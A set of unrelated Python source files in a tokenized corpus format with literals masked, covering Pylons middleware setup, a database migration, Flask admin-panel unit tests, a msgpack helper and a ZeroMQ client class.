<s> """<STR_LIT>""" <EOL> from beaker . middleware import CacheMiddleware , SessionMiddleware <EOL> from paste . cascade import Cascade <EOL> from paste . registry import RegistryManager <EOL> from paste . urlparser import StaticURLParser <EOL> from paste . deploy . converters import asbool <EOL> from pylons import config <EOL> from pylons . middleware import ErrorHandler , StatusCodeRedirect <EOL> from pylons . wsgiapp import PylonsApp <EOL> from routes . middleware import RoutesMiddleware <EOL> from shakespeare . config . environment import load_environment <EOL> def make_app ( global_conf , full_stack = True , static_files = True , ** app_conf ) : <EOL> """<STR_LIT>""" <EOL> load_environment ( global_conf , app_conf ) <EOL> app = PylonsApp ( ) <EOL> app = RoutesMiddleware ( app , config [ '<STR_LIT>' ] ) <EOL> app = SessionMiddleware ( app , config ) <EOL> app = CacheMiddleware ( app , config ) <EOL> from repoze . who . config import make_middleware_with_config <EOL> app = make_middleware_with_config ( app , global_conf , <EOL> app_conf [ '<STR_LIT>' ] , app_conf [ '<STR_LIT>' ] , <EOL> app_conf [ '<STR_LIT>' ] ) <EOL> if asbool ( full_stack ) : <EOL> app = ErrorHandler ( app , global_conf , ** config [ '<STR_LIT>' ] ) <EOL> if asbool ( config [ '<STR_LIT>' ] ) : <EOL> app = StatusCodeRedirect ( app ) <EOL> else : <EOL> app = StatusCodeRedirect ( app , [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> app = RegistryManager ( app ) <EOL> if asbool ( static_files ) : <EOL> static_app = StaticURLParser ( config [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> app = Cascade ( [ static_app , app ] ) <EOL> return app </s>
<s> from sqlalchemy import * <EOL> from migrate import * <EOL> import migrate . changeset <EOL> from shakespeare . migration . util import wrap_in_transaction <EOL> metadata = MetaData ( migrate_engine ) <EOL> material = Table ( '<STR_LIT>' , metadata , autoload = True ) <EOL> src_pkg = Column ( '<STR_LIT>' , UnicodeText ) <EOL> src_locator = Column ( '<STR_LIT>' , UnicodeText ) <EOL> resource_table = Table ( '<STR_LIT>' , metadata , <EOL> Column ( '<STR_LIT:id>' , Integer , primary_key = True ) , <EOL> Column ( '<STR_LIT>' , Integer , ForeignKey ( '<STR_LIT>' ) ) , <EOL> Column ( '<STR_LIT>' , UnicodeText ) , <EOL> Column ( '<STR_LIT>' , UnicodeText ) , <EOL> Column ( '<STR_LIT>' , UnicodeText , default = u'<STR_LIT:url>' ) , <EOL> ) <EOL> @ wrap_in_transaction <EOL> def upgrade ( ) : <EOL> resource_table . create ( ) <EOL> material . c [ '<STR_LIT>' ] . drop ( ) <EOL> material . c [ '<STR_LIT>' ] . drop ( ) <EOL> @ wrap_in_transaction <EOL> def downgrade ( ) : <EOL> src_pkg . create ( material ) <EOL> src_locator . create ( material ) <EOL> resource_table . drop ( ) </s>
<s> from shakespeare . tests import * <EOL> import shakespeare . model as model <EOL> import shakespeare . lib . feed as feed <EOL> class TestFeed : <EOL> nose_external = True <EOL> @ classmethod <EOL> def setup_class ( self ) : <EOL> TestData . make_fixture ( ) <EOL> @ classmethod <EOL> def teardown_class ( self ) : <EOL> TestData . remove_fixtures ( ) <EOL> def test_01_load_entry ( self ) : <EOL> import feedparser <EOL> entry = feedparser . FeedParserDict ( ) <EOL> title = u'<STR_LIT>' <EOL> name = title . strip ( ) <EOL> content = [ { '<STR_LIT:value>' : u'<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } ] <EOL> entry . title = title <EOL> entry . content = content <EOL> loader = feed . WorkIntroductionLoader ( ) <EOL> work = loader . load_entry ( entry ) <EOL> assert work . name == '<STR_LIT>' , work <EOL> model . Session . commit ( ) <EOL> model . Session . remove ( ) <EOL> work = model . Work . by_name ( TestData . name ) <EOL> assert work . notes == content [ <NUM_LIT:0> ] [ '<STR_LIT:value>' ] , work . notes <EOL> def _test_02_load_feed ( self ) : <EOL> '''<STR_LIT>''' <EOL> import webhelpers . feedgenerator as feedgenerator <EOL> atomfeed = feedgenerator . Atom1Feed ( <EOL> title = u'<STR_LIT>' , <EOL> link = u'<STR_LIT>' , <EOL> description = u'<STR_LIT>' , <EOL> language = u'<STR_LIT>' , <EOL> ) <EOL> atomfeed . add_item ( title = '<STR_LIT>' , link = u'<STR_LIT>' , <EOL> description = '<STR_LIT>' ) <EOL> feeddata = atomfeed . writeString ( '<STR_LIT:utf-8>' ) <EOL> loader = feed . WorkIntroductionLoader ( ) <EOL> results = loader . load_feed ( feeddata ) <EOL> assert len ( results ) == <NUM_LIT:1> , results </s>
<s> from pitchfork . setup_application import create_app <EOL> from pitchfork . config import config <EOL> from datetime import datetime <EOL> from uuid import uuid4 <EOL> import unittest <EOL> import urlparse <EOL> import re <EOL> class PitchforkManageTests ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> check_db = re . search ( '<STR_LIT>' , config . MONGO_DATABASE ) <EOL> if not check_db : <EOL> test_db = '<STR_LIT>' % config . MONGO_DATABASE <EOL> else : <EOL> test_db = config . MONGO_DATABASE <EOL> self . pitchfork , self . db = create_app ( test_db ) <EOL> self . app = self . pitchfork . test_client ( ) <EOL> self . app . get ( '<STR_LIT:/>' ) <EOL> def tearDown ( self ) : <EOL> self . db . sessions . remove ( ) <EOL> self . db . settings . remove ( ) <EOL> self . db . api_settings . remove ( ) <EOL> self . db . history . remove ( ) <EOL> self . db . forms . remove ( ) <EOL> def setup_user_login ( self , session ) : <EOL> session [ '<STR_LIT:username>' ] = '<STR_LIT>' <EOL> session [ '<STR_LIT>' ] = uuid4 ( ) . hex <EOL> session [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> session [ '<STR_LIT:email>' ] = '<STR_LIT>' <EOL> session [ '<STR_LIT>' ] = True <EOL> session [ '<STR_LIT:name>' ] = '<STR_LIT>' <EOL> session [ '<STR_LIT>' ] = uuid4 ( ) . hex <EOL> def setup_admin_login ( self , session ) : <EOL> session [ '<STR_LIT:username>' ] = '<STR_LIT>' <EOL> session [ '<STR_LIT>' ] = uuid4 ( ) . hex <EOL> session [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> session [ '<STR_LIT:email>' ] = '<STR_LIT>' <EOL> session [ '<STR_LIT>' ] = True <EOL> session [ '<STR_LIT:name>' ] = '<STR_LIT>' <EOL> session [ '<STR_LIT>' ] = uuid4 ( ) . hex <EOL> def setup_useable_admin ( self ) : <EOL> self . db . settings . update ( <EOL> { } , { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> } <EOL> } <EOL> ) <EOL> def setup_useable_history ( self ) : <EOL> history = { <EOL> '<STR_LIT:username>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:description>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:title>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : datetime . now ( ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:url>' : ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) , <EOL> '<STR_LIT>' : '<STR_LIT:POST>' , <EOL> '<STR_LIT:data>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) , <EOL> '<STR_LIT>' : ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) , <EOL> '<STR_LIT>' : ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> } <EOL> } <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:body>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:id>' : <NUM_LIT> , <EOL> '<STR_LIT>' : ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) , <EOL> '<STR_LIT>' : ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> } <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT:code>' : <NUM_LIT> <EOL> } , <EOL> '<STR_LIT:name>' : '<STR_LIT>' <EOL> } <EOL> self . db . history . insert ( history ) <EOL> def setup_default_field ( self , form_name ) : <EOL> data = { <EOL> '<STR_LIT:description>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:name>' : '<STR_LIT:test>' , <EOL> '<STR_LIT:default>' : True , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT:label>' : '<STR_LIT:test>' , <EOL> '<STR_LIT>' : <NUM_LIT:5> <EOL> } <EOL> self . db . forms . update ( <EOL> { '<STR_LIT:name>' : form_name } , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : data } } <EOL> ) <EOL> def retrieve_csrf_token ( self , data ) : <EOL> temp = re . search ( '<STR_LIT>' , data ) <EOL> if temp : <EOL> token = re . search ( '<STR_LIT>' , temp . group ( <NUM_LIT:1> ) ) <EOL> if token : <EOL> return token . group ( <NUM_LIT:1> ) <EOL> return '<STR_LIT>' <EOL> """<STR_LIT>""" <EOL> def test_pf_history ( self ) : <EOL> with self . app as c : <EOL> with c . session_transaction ( ) as sess : <EOL> self . setup_user_login ( sess ) <EOL> response = c . get ( '<STR_LIT>' ) <EOL> self . assertIn ( <EOL> '<STR_LIT>' , <EOL> response . data , <EOL> '<STR_LIT>' <EOL> ) <EOL> self . assertIn ( <EOL> '<STR_LIT>' , <EOL> response . data , <EOL> '<STR_LIT>' <EOL> ) <EOL> def test_pf_history_scrub ( self ) : <EOL> self . setup_useable_history ( ) <EOL> with self . app as c : <EOL> with c . session_transaction ( ) as sess : <EOL> self . setup_user_login ( sess ) <EOL> response = c . get ( <EOL> '<STR_LIT>' , <EOL> follow_redirects = True <EOL> ) <EOL> self . assertIn ( <EOL> '<STR_LIT>' , <EOL> response . data , <EOL> '<STR_LIT>' <EOL> ) <EOL> self . assertIn ( <EOL> '<STR_LIT>' , <EOL> response . data , <EOL> '<STR_LIT>' <EOL> ) <EOL> history = self . db . history . find_one ( { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> assert history , '<STR_LIT>' <EOL> def test_pf_history_scrub_no_history ( self ) : <EOL> with self . app as c : <EOL> with c . session_transaction ( ) as sess : <EOL> self . setup_user_login ( sess ) <EOL> response = c . get ( <EOL> '<STR_LIT>' , <EOL> follow_redirects = True <EOL> ) <EOL> self . assertIn ( <EOL> '<STR_LIT>' , <EOL> response . data , <EOL> '<STR_LIT>' <EOL> ) <EOL> self . assertIn ( <EOL> '<STR_LIT>' , <EOL> response . data , <EOL> '<STR_LIT>' <EOL> ) <EOL> def test_pf_favorites ( self ) : <EOL> with self . app as c : <EOL> with c . session_transaction ( ) as sess : <EOL> self . setup_user_login ( sess ) <EOL> response = c . get ( '<STR_LIT>' ) <EOL> self . assertIn ( <EOL> '<STR_LIT>' , <EOL> response . data , <EOL> '<STR_LIT>' <EOL> ) <EOL> """<STR_LIT>""" <EOL> def test_pf_manage_dcs_admin_perms ( self ) : <EOL> with self . app as c : <EOL> with c . session_transaction ( ) as sess : <EOL> self . setup_admin_login ( sess ) <EOL> response = c . get ( '<STR_LIT>' ) <EOL> assert response . _status_code == <NUM_LIT:200> , ( <EOL> '<STR_LIT>' % response . _status_code <EOL> ) <EOL> self . assertIn ( <EOL> '<STR_LIT>' , <EOL> response . data , <EOL> '<STR_LIT>' <EOL> ) <EOL> def test_pf_manage_dcs_user_perms ( self ) : <EOL> with self . app as c : <EOL> with c . session_transaction ( ) as sess : <EOL> self . setup_user_login ( sess ) <EOL> result = c . get ( '<STR_LIT>' ) <EOL> assert result . _status_code == <NUM_LIT> , ( <EOL> '<STR_LIT>' % result . _status_code <EOL> ) <EOL> request_path = urlparse . urlparse ( result . headers . get ( '<STR_LIT>' ) ) . path <EOL> self . assertEqual ( <EOL> request_path , <EOL> '<STR_LIT:/>' , <EOL> '<STR_LIT>' % request_path <EOL> ) <EOL> """<STR_LIT>""" <EOL> def test_pf_manage_dcs_add ( self ) : <EOL> with self . app as c : <EOL> with c . session_transaction ( ) as sess : <EOL> self . setup_admin_login ( sess ) <EOL> response = c . get ( '<STR_LIT>' ) <EOL> token = self . retrieve_csrf_token ( response . data ) <EOL> data = { <EOL> '<STR_LIT>' : token , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> response = c . post ( <EOL> '<STR_LIT>' , <EOL> data = data , <EOL> follow_redirects = True <EOL> ) <EOL> self . assertIn ( <EOL> '<STR_LIT>' , <EOL> response . data , <EOL> '<STR_LIT>' <EOL> ) <EOL> found_add = self . db . api_settings . find_one ( <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> ) <EOL> assert found_add , '<STR_LIT>' <EOL> def test_pf_manage_dcs_add_no_dcs ( self ) : <EOL> self . db . api_settings . update ( { } , { '<STR_LIT>' : { '<STR_LIT>' : <NUM_LIT:1> } } ) <EOL> with self . app as c : <EOL> with c . session_transaction ( ) as sess : <EOL> self . setup_admin_login ( sess ) <EOL> response = c . get ( '<STR_LIT>' ) <EOL> token = self . retrieve_csrf_token ( response . data ) <EOL> data = { <EOL> '<STR_LIT>' : token , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> response = c . post ( <EOL> '<STR_LIT>' , <EOL> data = data , <EOL> follow_redirects = True <EOL> ) <EOL> self . assertIn ( <EOL> '<STR_LIT>' , <EOL> response . data , <EOL> '<STR_LIT>' <EOL> ) <EOL> found_add = self . db . api_settings . find_one ( <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> ) <EOL> assert found_add , '<STR_LIT>' <EOL> def test_pf_manage_dcs_add_dupe ( self ) : <EOL> with self . app as c : <EOL> with c . session_transaction ( ) as sess : <EOL> self . setup_admin_login ( sess ) <EOL> response = c . get ( '<STR_LIT>' ) <EOL> token = self . retrieve_csrf_token ( response . data ) <EOL> data = { <EOL> '<STR_LIT>' : token , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> response = c . post ( <EOL> '<STR_LIT>' , <EOL> data = data , <EOL> follow_redirects = True <EOL> ) <EOL> self . assertIn ( <EOL> '<STR_LIT>' , <EOL> response . data , <EOL> '<STR_LIT>' <EOL> ) <EOL> self . assertIn ( <EOL> '<STR_LIT>' , <EOL> response . data , <EOL> '<STR_LIT>' <EOL> ) <EOL> api_settings = self . db . api_settings . find_one ( ) <EOL> dcs = api_settings . get ( '<STR_LIT>' ) <EOL> count = <NUM_LIT:0> <EOL> for dc in dcs : <EOL> if dc . get ( '<STR_LIT:name>' ) == '<STR_LIT>' : <EOL> count += <NUM_LIT:1> <EOL> self . assertEquals ( <EOL> count , <EOL> <NUM_LIT:1> , <EOL> '<STR_LIT>' % count <EOL> ) <EOL> def test_pf_manage_dcs_add_bad_data ( self ) : <EOL> with self . app as c : <EOL> with c . session_transaction ( ) as sess : <EOL> self . setup_admin_login ( sess ) <EOL> response = c . get ( '<STR_LIT>' ) <EOL> data = { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> response = c . post ( <EOL> '<STR_LIT>' , <EOL> data = data , <EOL> follow_redirects = True <EOL> ) <EOL> self . assertIn ( <EOL> ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) , <EOL> response . data , <EOL> '<STR_LIT>' <EOL> ) <EOL> def test_pf_manage_dcs_remove ( self ) : <EOL> with self . app as c : <EOL> with c . session_transaction ( ) as sess : <EOL> self . setup_admin_login ( sess ) <EOL> response = c . get ( <EOL> '<STR_LIT>' , <EOL> follow_redirects = True <EOL> ) <EOL> self . assertIn ( <EOL> '<STR_LIT>' , <EOL> response . data , <EOL> '<STR_LIT>' <EOL> ) <EOL> api_settings = self . db . api_settings . find_one ( ) <EOL> dcs = api_settings . get ( '<STR_LIT>' ) <EOL> count = <NUM_LIT:0> <EOL> for dc in dcs : <EOL> if dc . get ( '<STR_LIT:name>' ) == '<STR_LIT>' : <EOL> count += <NUM_LIT:1> <EOL> self . assertEquals ( <EOL> count , <EOL> <NUM_LIT:0> , <EOL> '<STR_LIT>' % count <EOL> ) <EOL> """<STR_LIT>""" <EOL> def test_pf_verbs_admin_perms ( self ) : <EOL> with self . app as c : <EOL> with c . session_transaction ( ) as sess : <EOL> self . setup_admin_login ( sess ) <EOL> response = c . get ( '<STR_LIT>' ) <EOL> assert response . _status_code == <NUM_LIT:200> , ( <EOL> '<STR_LIT>' % response . _status_code <EOL> ) <EOL> self . assertIn ( <EOL> '<STR_LIT>' , <EOL> response . data , <EOL> '<STR_LIT>' <EOL> ) <EOL> def test_pf_verbs_user_perms ( self ) : <EOL> with self . app as c : <EOL> with c . session_transaction ( ) as sess : <EOL> self . setup_user_login ( sess ) <EOL> result = c . get ( '<STR_LIT>' ) <EOL> assert result . _status_code == <NUM_LIT> , ( <EOL> '<STR_LIT>' % result . _status_code <EOL> ) <EOL> request_path = urlparse . urlparse ( result . headers . get ( '<STR_LIT>' ) ) . path <EOL> self . assertEqual ( <EOL> request_path , <EOL> '<STR_LIT:/>' , <EOL> '<STR_LIT>' % request_path <EOL> ) <EOL> """<STR_LIT>""" <EOL> def test_pf_verbs_add ( self ) : <EOL> with self . app as c : <EOL> with c . session_transaction ( ) as sess : <EOL> self . setup_admin_login ( sess ) <EOL> response = c . get ( '<STR_LIT>' ) <EOL> token = self . retrieve_csrf_token ( response . data ) <EOL> data = { <EOL> '<STR_LIT>' : token , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True <EOL> } <EOL> response = c . post ( <EOL> '<STR_LIT>' , <EOL> data = data , <EOL> follow_redirects = True <EOL> ) <EOL> self . assertIn ( <EOL> '<STR_LIT>' , <EOL> response . data , <EOL> '<STR_LIT>' <EOL> ) <EOL> found_add = self . db . api_settings . find_one ( <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> ) <EOL> assert found_add , '<STR_LIT>' <EOL> def test_pf_verbs_add_dupe ( self ) : <EOL> with self . app as c : <EOL> with c . session_transaction ( ) as sess : <EOL> self . setup_admin_login ( sess ) <EOL> response = c . get ( '<STR_LIT>' ) <EOL> token = self . retrieve_csrf_token ( response . data ) <EOL> data = { <EOL> '<STR_LIT>' : token , <EOL> '<STR_LIT:name>' : '<STR_LIT:GET>' , <EOL> '<STR_LIT>' : True <EOL> } <EOL> response = c . post ( <EOL> '<STR_LIT>' , <EOL> data = data , <EOL> follow_redirects = True <EOL> ) <EOL> self . assertIn ( <EOL> '<STR_LIT>' , <EOL> response . data , <EOL> '<STR_LIT>' <EOL> ) <EOL> api_settings = self . db . api_settings . find_one ( ) <EOL> verbs = api_settings . get ( '<STR_LIT>' ) <EOL> count = <NUM_LIT:0> <EOL> for verb in verbs : <EOL> if verb . get ( '<STR_LIT:name>' ) == '<STR_LIT:GET>' : <EOL> count += <NUM_LIT:1> <EOL> self . assertEquals ( <EOL> count , <EOL> <NUM_LIT:1> , <EOL> '<STR_LIT>' % count <EOL> ) <EOL> def test_pf_verbs_add_bad_data ( self ) : <EOL> with self . app as c : <EOL> with c . session_transaction ( ) as sess : <EOL> self . setup_admin_login ( sess ) <EOL> response = c . get ( '<STR_LIT>' ) <EOL> data = { <EOL> '<STR_LIT:name>' : '<STR_LIT:GET>' , <EOL> '<STR_LIT>' : True <EOL> } <EOL> response = c . post ( <EOL> '<STR_LIT>' , <EOL> data = data , <EOL> follow_redirects = True <EOL> ) <EOL> self . assertIn ( <EOL> ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) , <EOL> response . data , <EOL> '<STR_LIT>' <EOL> ) <EOL> def test_pf_verbs_remove ( self ) : <EOL> with self . app as c : <EOL> with c . session_transaction ( ) as sess : <EOL> self . setup_admin_login ( sess ) <EOL> response = c . get ( <EOL> '<STR_LIT>' , <EOL> follow_redirects = True <EOL> ) <EOL> self . assertIn ( <EOL> '<STR_LIT>' , <EOL> response . data , <EOL> '<STR_LIT>' <EOL> ) <EOL> api_settings = self . db . api_settings . find_one ( ) <EOL> verbs = api_settings . get ( '<STR_LIT>' ) <EOL> count = <NUM_LIT:0> <EOL> for verb in verbs : <EOL> if verb . get ( '<STR_LIT:name>' ) == '<STR_LIT:GET>' : <EOL> count += <NUM_LIT:1> <EOL> self . assertEquals ( <EOL> count , <EOL> <NUM_LIT:0> , <EOL> '<STR_LIT>' % count <EOL> ) <EOL> def test_pf_verbs_deactivate ( self ) : <EOL> with self . app as c : <EOL> with c . session_transaction ( ) as sess : <EOL> self . setup_admin_login ( sess ) <EOL> response = c . get ( <EOL> '<STR_LIT>' , <EOL> follow_redirects = True <EOL> ) <EOL> self . assertIn ( <EOL> '<STR_LIT>' , <EOL> response . data , <EOL> '<STR_LIT>' <EOL> ) <EOL> api_settings = self . db . api_settings . find_one ( ) <EOL> verbs = api_settings . get ( '<STR_LIT>' ) <EOL> deactivated = False <EOL> for verb in verbs : <EOL> if verb . get ( '<STR_LIT:name>' ) == '<STR_LIT:GET>' : <EOL> if not verb . get ( '<STR_LIT>' ) : <EOL> deactivated = True <EOL> assert deactivated , '<STR_LIT>' <EOL> def test_pf_verbs_activate ( self ) : <EOL> self . db . api_settings . update ( <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT:GET>' <EOL> } , { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : False <EOL> } <EOL> } <EOL> ) <EOL> with self . app as c : <EOL> with c . session_transaction ( ) as sess : <EOL> self . setup_admin_login ( sess ) <EOL> response = c . get ( <EOL> '<STR_LIT>' , <EOL> follow_redirects = True <EOL> ) <EOL> self . assertIn ( <EOL> '<STR_LIT>' , <EOL> response . data , <EOL> '<STR_LIT>' <EOL> ) <EOL> api_settings = self . db . api_settings . find_one ( ) <EOL> verbs = api_settings . get ( '<STR_LIT>' ) <EOL> activated = False <EOL> for verb in verbs : <EOL> if verb . get ( '<STR_LIT:name>' ) == '<STR_LIT:GET>' : <EOL> if verb . get ( '<STR_LIT>' ) : <EOL> activated = True <EOL> assert activated , '<STR_LIT>' <EOL> def test_pf_bad_key_for_actions ( self ) : <EOL> with self . app as c : <EOL> with c . session_transaction ( ) as sess : <EOL> self . setup_admin_login ( sess ) <EOL> response = c . get ( <EOL> '<STR_LIT>' , <EOL> follow_redirects = True <EOL> ) <EOL> self . assertIn ( <EOL> '<STR_LIT>' , <EOL> response . data , <EOL> '<STR_LIT>' <EOL> ) <EOL> api_settings = self . db . api_settings . find_one ( ) <EOL> verbs = api_settings . get ( '<STR_LIT>' ) <EOL> count = <NUM_LIT:0> <EOL> for verb in verbs : <EOL> if verb . get ( '<STR_LIT:name>' ) == '<STR_LIT:GET>' : <EOL> count += <NUM_LIT:1> <EOL> self . assertEquals ( <EOL> count , <EOL> <NUM_LIT:1> , <EOL> '<STR_LIT>' % count <EOL> ) <EOL> def test_pf_bad_action_for_actions ( self ) : <EOL> with self . app as c : <EOL> with c . session_transaction ( ) as sess : <EOL> self . setup_admin_login ( sess ) <EOL> response = c . get ( <EOL> '<STR_LIT>' , <EOL> follow_redirects = True <EOL> ) <EOL> self . assertIn ( <EOL> '<STR_LIT>' , <EOL> response . data , <EOL> '<STR_LIT>' <EOL> ) <EOL> api_settings = self . db . api_settings . find_one ( ) <EOL> verbs = api_settings . get ( '<STR_LIT>' ) <EOL> count = <NUM_LIT:0> <EOL> for verb in verbs : <EOL> if verb . get ( '<STR_LIT:name>' ) == '<STR_LIT:GET>' : <EOL> count += <NUM_LIT:1> <EOL> self . assertEquals ( <EOL> count , <EOL> <NUM_LIT:1> , <EOL> '<STR_LIT>' % count <EOL> ) <EOL> def test_pf_bad_dat_element_for_actions ( self ) : <EOL> with self . app as c : <EOL> with c . session_transaction ( ) as sess : <EOL> self . setup_admin_login ( sess ) <EOL> response = c . get ( <EOL> '<STR_LIT>' , <EOL> follow_redirects = True <EOL> ) <EOL> self . assertIn ( <EOL> '<STR_LIT>' , <EOL> response . data , <EOL> '<STR_LIT>' <EOL> ) <EOL> api_settings = self . db . api_settings . find_one ( ) <EOL> verbs = api_settings . get ( '<STR_LIT>' ) <EOL> count = <NUM_LIT:0> <EOL> for verb in verbs : <EOL> if verb . get ( '<STR_LIT:name>' ) == '<STR_LIT:GET>' : <EOL> count += <NUM_LIT:1> <EOL> self . assertEquals ( <EOL> count , <EOL> <NUM_LIT:1> , <EOL> '<STR_LIT>' % count <EOL> ) </s>
<s> __author__ = '<STR_LIT>' <EOL> import unittest , os <EOL> from dateutil . tz import tzlocal <EOL> from dateutil . parser import parse <EOL> from datetime import datetime , timedelta <EOL> class DateParserTestCase ( unittest . TestCase ) : <EOL> def test_no_offset_to_local ( self ) : <EOL> datestr_utc = "<STR_LIT>" <EOL> datestr_as_offset = "<STR_LIT>" <EOL> datestr__astimezone = parse ( datestr_utc ) . astimezone ( tz = tzlocal ( ) ) <EOL> datestr__astimezone_from_same_tz = parse ( datestr_as_offset ) . astimezone ( tz = tzlocal ( ) ) <EOL> self . assertEqual ( datestr__astimezone , datestr__astimezone_from_same_tz ) <EOL> start = datetime . now ( ) - timedelta ( minutes = <NUM_LIT:15> ) <EOL> now = datetime . now ( ) </s>
<s> import msgpack <EOL> WORKER_STATUS = "<STR_LIT>" <EOL> WORKER_HALT = "<STR_LIT>" <EOL> WORKER_LAST_ACTION = "<STR_LIT>" <EOL> class ServiceMessage ( object ) : <EOL> @ staticmethod <EOL> def dumps ( data ) : <EOL> if not isinstance ( data , ( tuple , list ) ) : <EOL> data = ( data , ) <EOL> return msgpack . packb ( data ) <EOL> @ staticmethod <EOL> def loads ( msg ) : <EOL> return msgpack . unpackb ( msg ) </s>
<s> import os <EOL> import re <EOL> def rm_from_pattern ( dir , pattern ) : <EOL> """<STR_LIT>""" <EOL> for f in os . listdir ( dir ) : <EOL> if re . search ( pattern , f ) : <EOL> os . remove ( os . path . join ( dir , f ) ) </s>
<s> from __future__ import absolute_import <EOL> import zmq <EOL> from . constants import FAILURE_STATUS <EOL> from . message import Request , Response , ResponseHeader <EOL> from . error import ELEVATOR_ERROR , TimeoutError <EOL> from . utils . snippets import sec_to_ms , ms_to_sec <EOL> from . utils . patterns import enum <EOL> class Client ( object ) : <EOL> STATUSES = enum ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def __init__ ( self , db_name = None , * args , ** kwargs ) : <EOL> self . transport = kwargs . pop ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . endpoint = kwargs . pop ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . host = "<STR_LIT>" % ( self . transport , self . endpoint ) <EOL> self . context = None <EOL> self . socket = None <EOL> self . _timeout = sec_to_ms ( kwargs . pop ( '<STR_LIT>' , <NUM_LIT:1> ) ) <EOL> self . _status = self . STATUSES . OFFLINE <EOL> self . _db_uid = None <EOL> self . setup_socket ( ) <EOL> if kwargs . pop ( '<STR_LIT>' , True ) is True : <EOL> self . connect ( db_name ) <EOL> def __del__ ( self ) : <EOL> self . teardown_socket ( ) <EOL> @ property <EOL> def status ( self ) : <EOL> return self . _status <EOL> @ status . setter <EOL> def status ( self , status ) : <EOL> if status in [ self . STATUSES . ONLINE , self . STATUSES . OFFLINE ] : <EOL> self . _status = status <EOL> else : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> def setup_socket ( self ) : <EOL> self . context = zmq . Context ( ) <EOL> self . socket = self . context . socket ( zmq . DEALER ) <EOL> self . socket . setsockopt ( zmq . LINGER , <NUM_LIT:0> ) <EOL> self . socket . setsockopt ( zmq . RCVTIMEO , self . timeout ) <EOL> self . socket . connect ( self . host ) <EOL> def teardown_socket ( self ) : <EOL> self . socket . close ( ) <EOL> self . context . term ( ) <EOL> @ property <EOL> def timeout ( self ) : <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> self . _timeout = sec_to_ms ( <NUM_LIT:1> ) <EOL> return self . _timeout <EOL> @ timeout . setter <EOL> def timeout ( self , value ) : <EOL> value_in_ms = sec_to_ms ( value ) <EOL> self . _timeout = value_in_ms <EOL> self . socket . setsockopt ( zmq . RCVTIMEO , self . _timeout ) <EOL> def connect ( self , db_name = None , * args , ** kwargs ) : <EOL> if self . status == self . STATUSES . OFFLINE : <EOL> self . status = self . STATUSES . ONLINE <EOL> db_name = '<STR_LIT:default>' if db_name is None else db_name <EOL> self . db_uid = self . send ( None , '<STR_LIT>' , [ db_name ] , * args , ** kwargs ) [ <NUM_LIT:0> ] 